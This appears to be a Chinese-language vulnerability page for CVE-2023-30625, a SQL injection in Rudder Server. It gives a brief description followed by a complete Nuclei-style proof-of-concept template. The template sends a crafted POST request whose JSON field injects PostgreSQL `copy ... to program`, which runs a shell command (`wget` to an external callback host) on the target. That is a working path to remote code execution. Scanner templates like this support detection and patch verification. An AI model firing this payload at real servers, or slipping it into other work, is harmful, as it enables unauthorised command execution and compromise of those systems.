CVE-2023-30625: Rudder Server < 1.3.0-rc.1 - SQL Injection

日期: 2025-08-01 | 影响软件: Rudder Server | POC: 已公开

漏洞描述

Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.

PoC代码[已公开]

id: CVE-2023-30625

info:
  name: Rudder Server < 1.3.0-rc.1  - SQL Injection
  author: gy741
  severity: high
  description: |
    Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.
  reference:
    - https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30625
    - http://packetstormsecurity.com/files/173837/Rudder-Server-SQL-Injection-Remote-Code-Execution.html
    - https://github.com/rudderlabs/rudder-server/commit/0d061ff2d8c16845179d215bf8012afceba12a30
    - https://github.com/rudderlabs/rudder-server/commit/2f956b7eb3d5eb2de3e79d7df2c87405af25071e
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-30625
    cwe-id: CWE-89
    epss-score: 0.89911
    epss-percentile: 0.99553
    cpe: cpe:2.3:a:rudderstack:rudder-server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rudderstack
    product: rudder-server
  tags: cve,cve2023,packetstorm,rudder,rudderstack,sqli
variables:
  cmd: "wget {{interactsh-url}}"

http:
  - raw:
      - |
        POST /v1/warehouse/pending-events HTTP/1.1
        Host: {{Hostname}}

        {"source_id": "test'; copy (SELECT '') to program '{{cmd}}'-- - "}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "error getting pending"

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: status
        status:
          - 500
# digest: 4a0a00473045022100b917ce50200269c523219978d6f0f2205b32537c38a24dad2c84095c3d0d3a5702204fe3fe92414e5f65caad04d63e4e2d03aefa0adeec6908fc49b6ef0c8b092325:922c64590222798bb761d5b6d8e72950

相关漏洞推荐